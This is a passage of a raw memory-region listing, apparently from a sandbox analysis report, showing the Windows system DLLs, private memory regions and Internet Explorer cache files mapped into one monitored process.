"\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1029 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1030 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1031 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1032 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1033 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1034 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1035 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1036 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1037 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1038 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1039 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1040 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1041 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1042 start_va = 0x749d0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749d37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1043 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1044 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1045 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1046 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1047 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1048 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1049 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1050 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1051 start_va = 0x630000 end_va = 0x7b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1052 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1053 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1054 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1055 start_va = 0x7c0000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1056 start_va = 0x950000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1057 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1058 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1059 start_va = 0x1d50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1060 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1061 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1062 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1063 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1064 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1065 start_va = 0x1ed0000 end_va = 0x219efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1066 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1067 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1068 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1069 start_va = 0x260000 end_va = 0x267fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1070 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1071 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1072 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1073 start_va = 0x3a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1074 start_va = 0x1d50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1075 start_va = 0x1e90000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1076 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1077 start_va = 0x73950000 end_va = 0x739a1fff monitored = 0 entry_point = 0x739514be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1078 start_va = 0x73930000 end_va = 0x73944fff monitored = 0 entry_point = 0x739312de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1079 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1080 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1081 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 1082 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1083 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1084 start_va = 0x1e50000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1085 start_va = 0x21a0000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1086 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 1087 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1088 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1089 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1090 start_va = 0x23a0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1091 start_va = 0x23e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1092 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1093 start_va = 0x24e0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1094 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1095 start_va = 0x749b0000 end_va = 0x749c6fff monitored = 0 entry_point = 0x749b1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1096 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1097 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1098 start_va = 0x74930000 end_va = 0x7496efff monitored = 0 entry_point = 0x74932351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1099 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1100 start_va = 0x2620000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1101 start_va = 0x2760000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 1102 start_va = 0x28d0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1103 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1104 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1105 start_va = 0x2620000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1106 start_va = 0x2750000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 1107 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1108 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1109 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1110 start_va = 0x3e0000 end_va = 0x3e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1111 start_va = 0x2760000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1112 start_va = 0x28c0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 1113 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1114 start_va = 0x28d0000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1115 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1116 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1117 start_va = 0x739d0000 end_va = 0x73a07fff monitored = 0 entry_point = 0x739d990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1118 start_va = 0x27a0000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1119 start_va = 0x27a0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1120 start_va = 0x27e0000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1121 start_va = 0x28d0000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1122 start_va = 0x2a40000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1123 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1124 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1125 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1126 start_va = 0x749a0000 end_va = 0x749a7fff monitored = 0 entry_point = 0x749a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1127 start_va = 0x74990000 end_va = 0x74997fff monitored = 0 entry_point = 0x749910e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1128 start_va = 0x71e60000 end_va = 0x71e97fff monitored = 0 entry_point = 0x71e61489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1129 start_va = 0x74970000 end_va = 0x74986fff monitored = 0 entry_point = 0x749735fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1130 start_va = 0x71ea0000 end_va = 0x71edcfff monitored = 0 entry_point = 0x71ea10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1131 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1132 start_va = 0x2820000 end_va = 0x285bfff monitored = 0 entry_point = 0x282128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1133 start_va = 0x2820000 end_va = 0x285bfff monitored = 0 entry_point = 0x282128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1134 start_va = 0x2820000 end_va = 0x285bfff monitored = 0 entry_point = 0x282128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1135 start_va = 0x2820000 end_va = 0x285bfff monitored = 0 entry_point = 0x282128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1136 start_va = 0x2820000 end_va = 0x285bfff monitored = 0 entry_point = 0x282128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1137 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1138 start_va = 0x2a80000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1139 start_va = 0x71e20000 end_va = 0x71e35fff monitored = 0 entry_point = 0x71e22061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1140 start_va = 0x3f0000 end_va = 0x3f9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1141 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1142 start_va = 0x2b80000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 1143 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1144 start_va = 0x2d80000 end_va = 0x2faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 1145 start_va = 0x2d80000 end_va = 0x2e5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d80000" filename = "" Region: id = 1146 start_va = 0x2f70000 end_va = 0x2faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 1147 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1148 start_va = 0x754c0000 end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1149 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1150 start_va = 0x71da0000 end_va = 0x71e1cfff monitored = 0 entry_point = 0x71da166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1151 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1152 start_va = 0x2720000 end_va = 0x2726fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1153 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1154 start_va = 0x2720000 end_va = 0x2726fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1155 start_va = 0x732e0000 end_va = 0x7330efff monitored = 0 entry_point = 0x732e1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1156 start_va = 0x2820000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 1157 start_va = 0x2fb0000 end_va = 0x91affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 1158 start_va = 0x71e40000 end_va = 0x71e51fff monitored = 0 entry_point = 0x71e43271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1159 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1160 start_va = 0x2720000 end_va = 0x2730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1161 start_va = 0x2860000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1162 start_va = 0x91b0000 end_va = 0xf3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091b0000" filename = "" Region: id = 1163 start_va = 0x736e0000 end_va = 0x737d4fff monitored = 0 entry_point = 0x736f0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1164 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1165 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1166 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1167 start_va = 0x2740000 end_va = 0x2743fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: 